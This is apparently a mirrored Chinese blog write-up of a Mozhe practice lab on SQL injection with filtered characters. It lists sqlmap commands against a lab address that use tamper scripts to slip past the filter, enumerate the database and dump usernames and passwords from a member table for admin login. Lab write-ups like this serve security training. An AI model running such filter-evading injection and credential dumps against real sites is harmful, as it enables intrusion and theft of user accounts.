SQL过滤字符后手工注入漏洞测试(第1题) - 走看看

zoukankan html css js c++ java

SQL过滤字符后手工注入漏洞测试(第1题)

https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

分析题目，属于时间盲注，这种情况，通常使用sqlmap 直接注入就行了，手动语法太复杂了！！！

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

登录后台，获取flag，提交即可

查看全文

相关阅读:
bzoj 4361: isn
bzoj 2560: 串珠子
 bzoj 3622: 已经没有什么好害怕的了
 UOJ #30. 【CF Round #278】Tourists
Codeforces Round #452 E. New Year and Old Subsequence
bzoj 2653: middle
codeforces701C
codeforces437C
codeforces518B
codeforces706C

原文地址：https://www.cnblogs.com/hack404/p/10755300.html

Copyright © 2011-2022 走看看